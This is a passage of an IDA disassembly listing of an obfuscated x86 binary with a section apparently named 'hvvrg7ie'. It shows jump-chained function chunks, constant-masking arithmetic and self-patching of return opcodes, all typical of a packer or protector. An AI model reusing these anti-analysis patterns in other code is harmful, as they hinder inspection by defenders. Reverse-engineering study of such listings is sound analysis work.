		add	eax, ebp
		add	eax, 542BC594h
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_45711A:				; CODE XREF: sub_449CB1:loc_456CE5j
		mov	eax, [eax]
		push	eax
		call	sub_458706
		jmp	loc_44CBF3
; END OF FUNCTION CHUNK	FOR sub_449CB1
; ---------------------------------------------------------------------------

loc_457127:				; CODE XREF: hvvrg7ie:0044789Fj
		mov	ebp, ecx
; START	OF FUNCTION CHUNK FOR sub_43CD49

loc_457129:				; CODE XREF: sub_43CD49:loc_447891j
		or	ecx, 4825DA43h
		add	ecx, 375535B4h
		xchg	ecx, [esp+0]
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_43CD49
; ---------------------------------------------------------------------------
		push	36FCE53Ch
		adc	edi, 228E5A04h
		jmp	loc_43F3D4
; ---------------------------------------------------------------------------

loc_45714D:				; CODE XREF: hvvrg7ie:0043C6A8j
		jge	loc_4482AE
; START	OF FUNCTION CHUNK FOR sub_440944

loc_457153:				; CODE XREF: sub_440944+1Bj
		jmp	nullsub_266
; END OF FUNCTION CHUNK	FOR sub_440944
; ---------------------------------------------------------------------------
		cmp	ebx, ebp
		jmp	loc_43AAF0
; ---------------------------------------------------------------------------

loc_45715F:				; DATA XREF: sub_43D285:loc_4494CEo
		push	eax
		call	sub_4584F2
		lea	eax, [ebp-0Ch]
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_457168:				; CODE XREF: sub_44C6BE:loc_45B5A5j
		push	eax
		push	79B09E7Bh
		jmp	loc_43F5CC
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2AF

loc_457173:				; CODE XREF: sub_44A2AF:loc_44A2BEj
		add	ebx, 0B295F19Eh
		mov	[ebx], eax

loc_45717B:				; CODE XREF: hvvrg7ie:loc_44D56Fj
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_44A2AF

; =============== S U B	R O U T	I N E =======================================



sub_45717D	proc near		; CODE XREF: sub_444E49j

; FUNCTION CHUNK AT 0044115D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045866F SIZE 0000000A BYTES

		push	ebp
		jmp	loc_44115D
sub_45717D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_457183:				; CODE XREF: sub_43A0EC+E21Aj
		jz	loc_4509BD
		jmp	loc_43A8CA
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_45718E:				; CODE XREF: sub_4408AE-47E3j
		jge	loc_44F6AA

loc_457194:				; CODE XREF: sub_43AF96:loc_45B7C9j
		push	0
		push	offset loc_4543A3
		jmp	loc_450496
; END OF FUNCTION CHUNK	FOR sub_4408AE

; =============== S U B	R O U T	I N E =======================================



sub_4571A0	proc near		; CODE XREF: hvvrg7ie:0043B30Bj
					; sub_44A2AF+Ap

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441607 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00444755 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446E38 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459EEF SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		call	sub_455751
		push	0F66D02E2h
		xchg	edx, [esp+4+var_4]
		mov	eax, edx
		jmp	loc_459EEF
sub_4571A0	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS	KEYPAD "+" TO EXPAND]
		dw 8D0Fh
		dd 0FFFE4443h, 43E9EF1Bh
		db 0A0h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_464. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4571C8	proc near		; CODE XREF: sub_43D285:loc_45B55Dp

; FUNCTION CHUNK AT 004565A9 SIZE 0000001E BYTES

		call	sub_45889B

loc_4571CD:				; CODE XREF: hvvrg7ie:0043FB67j
		jmp	loc_4565A9
sub_4571C8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD49

loc_4571D2:				; CODE XREF: sub_43CD49:loc_44DFDDj
		pop	ecx
		or	ecx, 773E63Bh
		rol	ecx, 1
		xor	ecx, 0D73D517Eh
		jmp	loc_44648A
; END OF FUNCTION CHUNK	FOR sub_43CD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_4571E6:				; CODE XREF: sub_45A91B:loc_444EFFj
		jl	loc_45B841

loc_4571EC:				; CODE XREF: hvvrg7ie:00452CD5j
		jmp	sub_449EB1
; END OF FUNCTION CHUNK	FOR sub_45A91B
; ---------------------------------------------------------------------------
		adc	esi, edi
		not	edx
		add	ebx, ebp
		jmp	loc_45B839
; ---------------------------------------------------------------------------

locret_4571FC:				; CODE XREF: hvvrg7ie:0044C9FAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_4571FD:				; CODE XREF: sub_44BCAE-DF8Dj
		jmp	loc_4470DB
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44772D

loc_457202:				; CODE XREF: sub_44772D-D2C8j
		add	ebx, ebp
		jmp	loc_43C60F
; END OF FUNCTION CHUNK	FOR sub_44772D
; ---------------------------------------------------------------------------

loc_457209:				; CODE XREF: hvvrg7ie:00446633j
		jns	loc_44481F

loc_45720F:				; CODE XREF: hvvrg7ie:loc_45A293j
		add	eax, 0B2A0A2C6h
		and	eax, ds:4000FAh
		xor	eax, 1686C0DCh
		call	sub_450C5A
		mov	ds:dword_41D088, eax
		lea	eax, nullsub_509
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_509
; ---------------------------------------------------------------------------

locret_45723A:				; CODE XREF: hvvrg7ie:loc_44C567j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499A7

loc_45723B:				; CODE XREF: sub_4499A7+B49Bj
		jmp	loc_43F5A2
; END OF FUNCTION CHUNK	FOR sub_4499A7
; ---------------------------------------------------------------------------

loc_457240:				; DATA XREF: sub_43B788+Fo
		sub	eax, 0B2698032h
		rol	eax, 1Dh
		xor	eax, 3CE7CA29h
		add	eax, 0F83D28FDh
		rol	eax, 1Ch
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_457258:				; CODE XREF: sub_44E6A5:loc_44C42Cj
		xor	eax, 0F7484AC1h
		jmp	loc_458D90
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------

loc_457263:				; CODE XREF: hvvrg7ie:0043EA6Cj
		xor	edi, 6D0B945h

; =============== S U B	R O U T	I N E =======================================



sub_457269	proc near		; CODE XREF: sub_440643+AD34p

; FUNCTION CHUNK AT 0044E0FF SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	[ebx], eax
		pop	ebx
		jmp	loc_44E0FF
sub_457269	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pushf
		jmp	loc_45937C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ADA5

loc_45727B:				; CODE XREF: sub_44ADA5-EB98j
		push	eax
		jmp	loc_45A31A
; END OF FUNCTION CHUNK	FOR sub_44ADA5
; ---------------------------------------------------------------------------

loc_457281:				; CODE XREF: hvvrg7ie:00439931j
		push	992FC2ABh
		pop	edx
		or	edx, 0A769D22Fh
		jmp	loc_44099E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_457292:				; CODE XREF: sub_452B83:loc_452B8Ej
		call	sub_448DB2

loc_457297:				; CODE XREF: sub_446829+AA8Ej
		jmp	loc_44272F
; END OF FUNCTION CHUNK	FOR sub_452B83

; =============== S U B	R O U T	I N E =======================================



sub_45729C	proc near		; DATA XREF: sub_45196D+2899o
		call	sub_44CB64
		push	32D78248h
		pop	eax
		or	eax, 0CDDDADA3h
		xor	eax, 0B277B41Bh

loc_4572B3:				; CODE XREF: sub_4484E1:loc_4416B0j
		call	sub_446F91
sub_45729C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_450434

loc_4572B8:				; CODE XREF: sub_450434:loc_45282Fj
		mov	esi, ebx
		xor	esi, edi
		jmp	loc_44CE5E
; END OF FUNCTION CHUNK	FOR sub_450434

; =============== S U B	R O U T	I N E =======================================



sub_4572C1	proc near		; CODE XREF: sub_44107D+14C24p
					; hvvrg7ie:004575C1j
		xchg	edx, [esp+0]
		pop	edx
		push	ds:dword_45A8A0
		retn
sub_4572C1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A003

loc_4572CC:				; CODE XREF: sub_45A003-1ABD2j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_45A003

; =============== S U B	R O U T	I N E =======================================



sub_4572D1	proc near		; CODE XREF: sub_44107D+D37Ap
					; sub_44107D+EF8Ep

; FUNCTION CHUNK AT 00444996 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447D69 SIZE 00000005 BYTES

		mov	eax, cs
		xor	al, al
		or	eax, eax
		jnz	loc_4449A3
		jmp	loc_447D69
sub_4572D1	endp

; ---------------------------------------------------------------------------
		rol	eax, 19h
		push	ecx
		push	1EA84E0h
		pop	ecx
		add	ecx, 643485C4h
		or	ecx, 0BA58FE66h
		add	ecx, 4A8235B2h
		jmp	loc_4494AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_457304:				; CODE XREF: sub_441FE4:loc_44A332j
		jmp	loc_44856F
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
		db 4Ch,	77h, 0A4h
dword_45730C	dd 0			; DATA XREF: hvvrg7ie:loc_43CADCw
; ---------------------------------------------------------------------------

loc_457310:				; CODE XREF: hvvrg7ie:0043D6BFj
		jmp	nullsub_429
; ---------------------------------------------------------------------------

loc_457315:				; DATA XREF: sub_4466CE+5BDBo
					; sub_456FF3o
		mov	al, ds:113DF6B7h
		test	[ebx+33h], al
		inc	esi
		mov	eax, 63B164h

loc_457323:				; CODE XREF: hvvrg7ie:0043FF6Ej
		jmp	loc_451ECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_457328:				; CODE XREF: sub_44E34F-11C95j
		jmp	loc_43BC07
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
		jns	loc_4596F3
		mov	edx, ds:dword_43A968
		or	edx, edx
		jnz	loc_456FC9
		jmp	loc_45971C
; ---------------------------------------------------------------------------

loc_457346:				; CODE XREF: hvvrg7ie:loc_457678j
		call	sub_450C5A
		push	ebx
		push	0A1B4488h
		pop	ebx
		sub	ebx, 0BF2D2A7Eh
		add	ebx, 0B553B772h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_43A1B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_457366:				; CODE XREF: sub_4544DD:loc_44C195j
		jz	loc_43D607
; END OF FUNCTION CHUNK	FOR sub_4544DD
; START	OF FUNCTION CHUNK FOR sub_4399AE

loc_45736C:				; CODE XREF: sub_4399AE+1Bj
		jmp	loc_43B89B
; END OF FUNCTION CHUNK	FOR sub_4399AE
; ---------------------------------------------------------------------------
		jnz	loc_444771
		xor	eax, 0F6C380F4h
		ror	edx, 1Dh
		or	edi, 12FE2233h
		jmp	loc_43D605
; ---------------------------------------------------------------------------

loc_45738B:				; DATA XREF: sub_455AA0+7o
		mov	ds:dword_448D00, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_457392:				; CODE XREF: sub_456A52-11623j
		rol	eax, 7
		push	eax
		jmp	loc_44C9A5
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
		xor	eax, 99E3A1DAh
		push	esi
		push	0FA4EB37Dh
		pop	esi
		add	esi, 3B94C8B0h
		jmp	loc_44C0CA
; ---------------------------------------------------------------------------
		call	nullsub_23
		jmp	ds:dword_41D15C
; ---------------------------------------------------------------------------

loc_4573BE:				; CODE XREF: hvvrg7ie:0044181Aj
		jmp	loc_447A11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		js	loc_43ABFA
		mov	eax, [esp]
		jmp	loc_453108
; ---------------------------------------------------------------------------

loc_4573D2:				; DATA XREF: sub_43CD0B:loc_443312o
		imul	byte ptr [edx]

loc_4573D4:				; CODE XREF: hvvrg7ie:loc_43CB2Fj
		cmp	al, 0A4h
		jz	loc_446988
		jmp	loc_44FC9A
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 4Bh
		dd 0E9FFFF1Ch, 0FFFEB770h
; ---------------------------------------------------------------------------

locret_4573EC:				; CODE XREF: hvvrg7ie:loc_452344j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_4573ED:				; CODE XREF: sub_44B1C6+5AAFj
		jnp	loc_44F483
		mov	ebx, [eax]
		cmp	ebx, 5096742Bh
		jmp	loc_44781C
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449B47

loc_457400:				; CODE XREF: sub_449B47+11j
		xor	eax, 58D46F67h
		and	eax, 0DA6CFB43h
		xor	eax, 58FD9238h
		push	ebx
		mov	ebx, esi
; END OF FUNCTION CHUNK	FOR sub_449B47
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_457415:				; CODE XREF: sub_452F0E:loc_43D0FDj
		xchg	ebx, [esp+8+var_8]
		push	79641BC0h
		jmp	loc_44BBCB
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------

loc_457422:				; CODE XREF: hvvrg7ie:loc_455776j
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F2E3
; ---------------------------------------------------------------------------
		push	edx
		push	8FA7EEA1h
		pop	edx
		xor	edx, 0A9FDD539h
		add	edx, 0D9EB68DEh
		jmp	loc_441483
; ---------------------------------------------------------------------------
		ror	ecx, 1Ch
		jmp	sub_445591
; ---------------------------------------------------------------------------

loc_45744A:				; DATA XREF: sub_45B72C-2095Ao
		xchg	eax, [esp]
		jmp	loc_451221
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_457452:				; CODE XREF: sub_452B83:loc_44273Cj
		or	eax, 0F6C3AE7Ch
		test	eax, 10h
		jmp	loc_44673D
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_457463:				; CODE XREF: sub_45AAC8:loc_43FFECj
		pop	edi
		sub	edi, 79F93F9Eh
		js	loc_456E6D

loc_457470:				; CODE XREF: hvvrg7ie:0043D305j
		jmp	nullsub_429
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
		rol	esi, 15h
		jmp	loc_44AE25
; ---------------------------------------------------------------------------

loc_45747D:				; DATA XREF: sub_447662:loc_4408EEo
		jno	loc_45102C
		lea	eax, [ebp-0Ch]
		push	eax
		push	edx
		push	0B6EE4D31h
		pop	edx
		xor	edx, 0F4D83272h
		add	edx, 0BE0E8EEAh
		jmp	loc_43BD14
; ---------------------------------------------------------------------------

loc_45749F:				; CODE XREF: hvvrg7ie:0044164Fj
		push	1826D11h
		xchg	ecx, [esp]
		mov	ebx, ecx
		pop	ecx
		and	ebx, 0FF651D65h
		add	ebx, 0FF443801h
		jmp	loc_439CC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C267

loc_4574BB:				; CODE XREF: sub_44C267:loc_44E131j
		lea	eax, nullsub_11
		call	sub_455D5E
; END OF FUNCTION CHUNK	FOR sub_44C267
; START	OF FUNCTION CHUNK FOR sub_451669

loc_4574C6:				; CODE XREF: sub_451669-8223j
		jl	loc_448C96

loc_4574CC:				; CODE XREF: hvvrg7ie:0044509Dj
		jmp	loc_4480EA
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ADC

loc_4574D1:				; CODE XREF: sub_455ADC-1BBC4j
		jmp	nullsub_271
; END OF FUNCTION CHUNK	FOR sub_455ADC
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_448C8B
; ---------------------------------------------------------------------------
		add	ebp, eax
		jmp	sub_455CD4
; ---------------------------------------------------------------------------
		jnb	loc_454DD4
		jmp	loc_44D7AA

; =============== S U B	R O U T	I N E =======================================



sub_4574EE	proc near		; CODE XREF: hvvrg7ie:0043D4FFj
					; sub_456F9F+14p
		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [ebp-1Ch]
		shl	eax, 8
		mov	edx, [ebp-20h]
		movzx	edx, byte ptr [edx]

loc_4574FE:				; CODE XREF: sub_456763-1557Ej
		jmp	loc_43B0D4
sub_4574EE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_457503:				; CODE XREF: sub_43F227-4EC8j
		jnz	loc_450FA0
		jmp	loc_44194C
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_45750E:				; CODE XREF: sub_45541B:loc_4442DBj
		test	eax, eax
		jz	loc_4426C4
		jmp	loc_45176B
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------

loc_45751B:				; CODE XREF: hvvrg7ie:0045B7FEj
		pop	ebp
		xchg	ebp, [esp]
		push	edi
		mov	edi, ecx
		xchg	edi, [esp]
		or	ecx, edx
		jmp	loc_44D399
; ---------------------------------------------------------------------------

loc_45752C:				; CODE XREF: hvvrg7ie:00441726j
		jge	loc_454D14

; =============== S U B	R O U T	I N E =======================================



sub_457532	proc near		; CODE XREF: sub_4542E5+6p

; FUNCTION CHUNK AT 0044C9FF SIZE 00000007 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_4506F9
		mov	edx, [ebp-18h]
		jmp	loc_44C9FF
sub_457532	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_457543:				; CODE XREF: sub_450F97+4j
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		js	loc_43FB02
		sub	al, 99h
		mov	edx, [ebp+var_4]
		jmp	loc_45519C
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_457560:				; CODE XREF: sub_451E6D:loc_43A9FCj
		jnz	loc_445CEE
		jmp	loc_45AC53
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_45756B:				; CODE XREF: sub_439E6C:loc_440A7Ej
		mov	eax, edx
		pop	edx
		or	eax, 6E0FCEA7h
		rol	eax, 5
		xor	eax, 8266C550h
		sub	eax, 365121CBh
		add	eax, 0C2FBFF12h
		jmp	loc_44172B
; END OF FUNCTION CHUNK	FOR sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_45758E:				; CODE XREF: sub_452F0E-15E09j
					; sub_44BFF5-C5CFj ...
		call	sub_44E3B3

loc_457593:				; CODE XREF: sub_446407+E6A8j
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_457598:				; CODE XREF: sub_447E20+8j
		jmp	loc_43C753
; END OF FUNCTION CHUNK	FOR sub_447E20
; ---------------------------------------------------------------------------

loc_45759D:				; CODE XREF: hvvrg7ie:00440451j
		jmp	loc_43E64A
; ---------------------------------------------------------------------------

loc_4575A2:				; DATA XREF: sub_446D8D+79BEo
		mov	eax, [ebp+8]
		push	eax
		cmp	dword ptr [ebp-14h], 6
		setz	al
		call	sub_447079
		pop	ecx
		jmp	loc_450057
; ---------------------------------------------------------------------------

loc_4575B8:				; CODE XREF: hvvrg7ie:0044A269j
		jnp	loc_4463FA
		mov	ebx, [ebp+0]
		jmp	sub_4572C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_4575C6:				; CODE XREF: sub_449425-71B2j
		mov	eax, [esp+0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_44E560
		jmp	loc_44D70E
; END OF FUNCTION CHUNK	FOR sub_449425

; =============== S U B	R O U T	I N E =======================================



sub_4575D9	proc near		; DATA XREF: sub_4521D4-234Do

; FUNCTION CHUNK AT 0043CDF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D61D SIZE 0000000B BYTES

		add	edx, 0C8495D89h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_44D61D
sub_4575D9	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4575E9:				; CODE XREF: sub_44D2F8:loc_454737j
		jmp	loc_4487DC
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		jmp	loc_43E4D9
; ---------------------------------------------------------------------------
		jmp	loc_451963
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4575F8:				; CODE XREF: sub_454099-F342j
					; sub_454099-CB9Ej ...
		jnz	loc_4543AA
		cmp	dword ptr [ebp-10Ch], 36343831h
		jnz	loc_441D60
		jmp	loc_43AFA2
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_457613:				; DATA XREF: sub_43D47E:loc_44490Co
		xor	eax, 25D6CCD7h

loc_457619:				; CODE XREF: hvvrg7ie:loc_44CD9Bj
		call	sub_450C5A
		mov	ds:dword_41D164, eax
		lea	eax, nullsub_26
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_26
; ---------------------------------------------------------------------------

loc_457632:				; CODE XREF: hvvrg7ie:0045B302j
		mov	eax, [esp]
		jmp	loc_43FB5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_45763A:				; CODE XREF: sub_450F97:loc_45519Cj
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_455948
		jmp	loc_44D021
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_457649:				; CODE XREF: sub_4485A2-F07Ej
		pop	esi
		not	edi
; END OF FUNCTION CHUNK	FOR sub_4485A2
; START	OF FUNCTION CHUNK FOR sub_454789

loc_45764C:				; CODE XREF: sub_44388C-46E4j
					; sub_449D38-7D2Bj ...
		jmp	loc_45B207
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ABA3

loc_457651:				; CODE XREF: sub_44ABA3-949Fj
					; sub_454E81+Dj
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44ABA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_457659:				; CODE XREF: sub_4408AE+4601j
		jmp	loc_457CB8
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AA0

loc_45765E:				; CODE XREF: sub_452AA0-177C1j
		jmp	loc_443360
; END OF FUNCTION CHUNK	FOR sub_452AA0
; ---------------------------------------------------------------------------

loc_457663:				; DATA XREF: sub_45488E:loc_44C3B6o
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D428
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_45766B:				; CODE XREF: sub_450590-3167j
		mov	eax, [esp-4+arg_0]
		call	sub_43E163

loc_457673:				; CODE XREF: sub_458A57+13j
		jmp	loc_4596B4
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------

loc_457678:				; CODE XREF: hvvrg7ie:00442E0Bj
		jmp	loc_457346
; ---------------------------------------------------------------------------

loc_45767D:				; CODE XREF: hvvrg7ie:00446402j
		add	ebx, eax
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_45767F:				; CODE XREF: sub_43D285:loc_4463EEj
		push	offset sub_446D3C
		jmp	nullsub_445
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_457689:				; CODE XREF: sub_445BE8+867j
		or	eax, 0F8F760FDh
		popf
		cdq
; END OF FUNCTION CHUNK	FOR sub_445BE8
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_457691:				; CODE XREF: sub_446EC2:loc_4407ACj
					; sub_458F33-F614j ...
		jmp	loc_44494C
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_457696:				; CODE XREF: sub_458F33-F13Cj
					; hvvrg7ie:0044BB94j
		call	sub_452FB4

loc_45769B:				; CODE XREF: hvvrg7ie:loc_447A2Ej
		add	eax, ebp
		add	eax, 1D012A12h
		push	eax
		mov	eax, [ebp+8]
		push	eax

loc_4576A8:				; CODE XREF: hvvrg7ie:00449FCEj
		call	sub_458706
		cmp	dword ptr [ebp-8], 0
		jmp	loc_441413
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------
		not	ecx
		jmp	loc_44616D
; ---------------------------------------------------------------------------
		and	edx, 228584F7h
		add	esi, ebp
		jmp	sub_43E507
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E72F

loc_4576CA:				; CODE XREF: sub_44E72F-10C88j
					; sub_44E72F-6E87j
		cmp	dword ptr [ebp-1Ch], 67h
		jnz	loc_44063B
		mov	eax, 6
		sub	eax, [ebp-4]
		mov	[ebp-4], eax
		jmp	loc_44063B
; END OF FUNCTION CHUNK	FOR sub_44E72F

; =============== S U B	R O U T	I N E =======================================



sub_4576E4	proc near		; CODE XREF: sub_43EE33-5E05p
					; sub_43EE33:loc_446EA7p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F2CA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044A2AA SIZE 00000005 BYTES

		call	sub_45B07D
		shr	edx, 5
		jmp	loc_43F2CA
sub_4576E4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_4576F1:				; CODE XREF: sub_43C354:loc_458AFCj
		pop	ebp
		mov	eax, ds:dword_439CD4
		or	eax, eax
		jnz	loc_45AEF0
		jmp	loc_44B960
; END OF FUNCTION CHUNK	FOR sub_43C354

; =============== S U B	R O U T	I N E =======================================



sub_457705	proc near		; CODE XREF: sub_450A7A+53BAp
					; hvvrg7ie:0045615Aj
		xchg	ebx, [esp+0]
		pop	ebx
		mov	[ebx], eax
		pop	ebx
		lea	eax, nullsub_486
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_486
sub_457705	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45771A	proc near		; CODE XREF: hvvrg7ie:0043E7D6j
					; hvvrg7ie:00447D94p

; FUNCTION CHUNK AT 00458266 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		lea	eax, sub_45196D
		mov	byte ptr [eax],	0C3h
		jmp	loc_458266
sub_45771A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_45772C:				; CODE XREF: sub_45196D+6j
		mov	eax, [esp+0]
		push	edx
		jmp	loc_43F011
; END OF FUNCTION CHUNK	FOR sub_45196D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_369. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4470A9

loc_457736:				; CODE XREF: sub_4470A9+Cj
		jmp	loc_44FE67
; END OF FUNCTION CHUNK	FOR sub_4470A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_45773B:				; CODE XREF: sub_451669-F2C0j
		jmp	loc_45AA65
; END OF FUNCTION CHUNK	FOR sub_451669

; =============== S U B	R O U T	I N E =======================================



sub_457740	proc near		; CODE XREF: sub_44AC6E:loc_439E05p
					; hvvrg7ie:0045A129j

; FUNCTION CHUNK AT 004487BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF1B SIZE 0000000E BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_44BF29
		pop	eax
		jmp	loc_4487BC
sub_457740	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_45774F:				; CODE XREF: sub_445934:loc_445942j
		sub	eax, 3B10982Dh
		mov	edx, [esp-8+arg_4]
		push	edi
		mov	edi, eax
		xchg	edi, [esp-4+arg_0]
		call	sub_455DCC

loc_457763:				; CODE XREF: sub_45B94B-16900j
		add	eax, 0C35F5C24h
		test	eax, 800h
